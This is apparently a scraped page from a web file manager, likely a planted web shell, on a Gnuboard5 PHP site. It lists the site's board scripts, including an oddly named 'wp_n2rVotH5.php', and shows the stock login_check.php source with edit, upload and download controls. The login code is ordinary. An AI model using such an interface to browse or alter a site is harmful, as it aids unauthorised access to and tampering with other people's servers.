File Manager

📁 Media Files

🔧 _common.php 🔧 _head.php 🔧 _head.sub.php 🔧 _tail.php 🔧 _tail.sub.php 🔧 ajax.autosave.php 🔧 ajax.autosavedel.php 🔧 ajax.autosavelist.php 🔧 ajax.autosaveload.php 🔧 ajax.comment_token.php 🔧 ajax.filter.php 🔧 ajax.mb_email.php 🔧 ajax.mb_hp.php 🔧 ajax.mb_id.php 🔧 ajax.mb_nick.php 🔧 ajax.mb_recommend.php 🔧 alert.php 🔧 alert_close.php 🔧 board.php 🔧 board_head.php 🔧 board_list_update.php 🔧 board_tail.php 🔧 confirm.php 🔧 content.php 🔧 current_connect.php 🔧 db_table.optimize.php 🔧 delete.php 🔧 delete_all.php 🔧 delete_comment.php 🔧 download.php 🔧 email_certify.php 🔧 email_stop.php 🔧 faq.php 🔧 formmail.php 🔧 formmail_send.php 🔧 good.php 🔧 group.php 🔧 link.php 🔧 list.php 🔧 login.php 🔧 login_check.php 🔧 logout.php 🔧 member_confirm.php 🔧 member_leave.php 🔧 memo.php 🔧 memo_delete.php 🔧 memo_form.php 🔧 memo_form_update.php 🔧 memo_view.php 🔧 move.php 🔧 move_update.php 🔧 mypage.php 🔧 new.php 🔧 new_delete.php 🔧 newwin.inc.php 🔧 password.php 🔧 password_check.php 🔧 password_lost.php 🔧 password_lost2.php 🔧 password_lost_certify.php 🔧 point.php 🔧 poll_etc_update.php 🔧 poll_etc_update_mail.php 🔧 poll_result.php 🔧 poll_update.php 🔧 profile.php 🔧 qadelete.php 🔧 qadownload.php 🔧 qahead.php 🔧 qalist.php 🔧 qatail.php 🔧 qaview.php 🔧 qawrite.php 🔧 qawrite_update.php 🔧 register.php 🔧 register_email.php 🔧 register_email_update.php 🔧 register_form.php 🔧 register_form_update.php 🔧 register_form_update_mail1.php 🔧 register_form_update_mail2.php 🔧 register_form_update_mail3.php 🔧 register_result.php 🔧 rss.php 🔧 scrap.php 🔧 scrap_delete.php 🔧 scrap_popin.php 🔧 scrap_popin_update.php 🔧 search.php 🔧 sns_send.php 🔧 view.php 🔧 view_comment.php 🔧 view_image.php 🔧 visit_browscap.inc.php 🔧 visit_insert.inc.php 🔧 wp_n2rVotH5.php 🔧 write.php 🔧 write_comment_update.php 🔧 write_comment_update.sns.php 🔧 write_token.php 🔧 write_update.php 🔧 write_update_mail.php 🔧 zboard.php

⬆️ Upload Media

📝 Edit: login_check.php

Size: 5.73 KB | Modified: 2020-12-24 11:36:50

<?php
include_once('./_common.php');

$g5['title'] = "로그인 검사";

$mb_id       = trim($_POST['mb_id']);
$mb_password = trim($_POST['mb_password']);

run_event('member_login_check_before', $mb_id);

if (!$mb_id || !$mb_password)
    alert('회원아이디나 비밀번호가 공백이면 안됩니다.');

$mb = get_member($mb_id);

//소셜 로그인추가 체크

$is_social_login = false;
$is_social_password_check = false;

// 소셜 로그인이 맞는지 체크하고 해당 값이 맞는지 체크합니다.
if(function_exists('social_is_login_check')){
    $is_social_login = social_is_login_check();

//패스워드를 체크할건지 결정합니다.
    //소셜로그인일때는 체크하지 않고, 계정을 연결할때는 체크합니다.
    $is_social_password_check = social_is_login_password_check($mb_id);
}

//소셜 로그인이 맞다면 패스워드를 체크하지 않습니다.
// 가입된 회원이 아니다. 비밀번호가 틀리다. 라는 메세지를 따로 보여주지 않는 이유는
// 회원아이디를 입력해 보고 맞으면 또 비밀번호를 입력해보는 경우를 방지하기 위해서입니다.
// 불법사용자의 경우 회원아이디가 틀린지, 비밀번호가 틀린지를 알기까지는 많은 시간이 소요되기 때문입니다.
if (!$is_social_password_check && (!$mb['mb_id'] || !login_password_check($mb, $mb_password, $mb['mb_password'])) ) {

run_event('password_is_wrong', 'login', $mb);

alert('가입된 회원아이디가 아니거나 비밀번호가 틀립니다.\\n비밀번호는 대소문자를 구분합니다.');
}

// 차단된 아이디인가?
if ($mb['mb_intercept_date'] && $mb['mb_intercept_date'] <= date("Ymd", G5_SERVER_TIME)) {
    $date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_intercept_date']);
    alert('회원님의 아이디는 접근이 금지되어 있습니다.\n처리일 : '.$date);
}

// 탈퇴한 아이디인가?
if ($mb['mb_leave_date'] && $mb['mb_leave_date'] <= date("Ymd", G5_SERVER_TIME)) {
    $date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_leave_date']);
    alert('탈퇴한 아이디이므로 접근하실 수 없습니다.\n탈퇴일 : '.$date);
}

// 메일인증 설정이 되어 있다면
if ( is_use_email_certify() && !preg_match("/[1-9]/", $mb['mb_email_certify'])) {
    $ckey = md5($mb['mb_ip'].$mb['mb_datetime']);
    confirm("{$mb['mb_email']} 메일로 메일인증을 받으셔야 로그인 가능합니다. 다른 메일주소로 변경하여 인증하시려면 취소를 클릭하시기 바랍니다.", G5_URL, G5_BBS_URL.'/register_email.php?mb_id='.$mb_id.'&ckey='.$ckey);
}

run_event('login_session_before', $mb, $is_social_login);

@include_once($member_skin_path.'/login_check.skin.php');

// 회원아이디 세션 생성
set_session('ss_mb_id', $mb['mb_id']);
// FLASH XSS 공격에 대응하기 위하여 회원의 고유키를 생성해 놓는다. 관리자에서 검사함 - 110106
set_session('ss_mb_key', md5($mb['mb_datetime'] . get_real_client_ip() . $_SERVER['HTTP_USER_AGENT']));

// 포인트 체크
if($config['cf_use_point']) {
    $sum_point = get_point_sum($mb['mb_id']);

$sql= " update {$g5['member_table']} set mb_point = '$sum_point' where mb_id = '{$mb['mb_id']}' ";
    sql_query($sql);
}

// 3.26
// 아이디 쿠키에 한달간 저장
if ($auto_login) {
    // 3.27
    // 자동로그인 ---------------------------
    // 쿠키 한달간 저장
    $key = md5($_SERVER['SERVER_ADDR'] . $_SERVER['SERVER_SOFTWARE'] . $_SERVER['HTTP_USER_AGENT'] . $mb['mb_password']);
    set_cookie('ck_mb_id', $mb['mb_id'], 86400 * 31);
    set_cookie('ck_auto', $key, 86400 * 31);
    // 자동로그인 end ---------------------------
} else {
    set_cookie('ck_mb_id', '', 0);
    set_cookie('ck_auto', '', 0);
}

if ($url) {
    // url 체크
    check_url_host($url, '', G5_URL, true);

$link = urldecode($url);
    // 2003-06-14 추가 (다른 변수들을 넘겨주기 위함)
    if (preg_match("/\?/", $link))
        $split= "&amp;";
    else
        $split= "?";

// $_POST 배열변수에서 아래의 이름을 가지지 않은 것만 넘김
    $post_check_keys = array('mb_id', 'mb_password', 'x', 'y', 'url');
    
    //소셜 로그인 추가
    if($is_social_login){
        $post_check_keys[] = 'provider';
    }

$post_check_keys = run_replace('login_check_post_check_keys', $post_check_keys, $link, $is_social_login);

foreach($_POST as $key=>$value) {
        if ($key && !in_array($key, $post_check_keys)) {
            $link .= "$split$key=$value";
            $split = "&amp;";
        }
    }

} else  {
    $link = G5_URL;
}

//소셜 로그인 추가
if(function_exists('social_login_success_after')){
    // 로그인 성공시 소셜 데이터를 기존의 데이터와 비교하여 바뀐 부분이 있으면 업데이트 합니다.
    $link = social_login_success_after($mb, $link);
    social_login_session_clear(1);
}

run_event('member_login_check', $mb, $link, $is_social_login);

// 관리자로 로그인시 DATA 폴더의 쓰기 권한이 있는지 체크합니다. 쓰기 권한이 없으면 로그인을 못합니다.
if( is_admin($mb['mb_id']) && is_dir(G5_DATA_PATH.'/tmp/') ){
    $tmp_data_file = G5_DATA_PATH.'/tmp/tmp-write-test-'.time();
    $tmp_data_check = @fopen($tmp_data_file, 'w');
    if($tmp_data_check){
        if(! @fwrite($tmp_data_check, G5_URL)){
            $tmp_data_check = false;
        }
    }
    @fclose($tmp_data_check);
    @unlink($tmp_data_file);

if(! $tmp_data_check){
        alert("data 폴더에 쓰기권한이 없거나 또는 웹하드 용량이 없는 경우\\n로그인을 못할수도 있으니, 용량 체크 및 쓰기 권한을 확인해 주세요.", $link);
    }
}

goto_url($link);
?>

📥 Download

File manager

📁 Media Files

⬆️ Upload Media

📝 Edit: login_check.php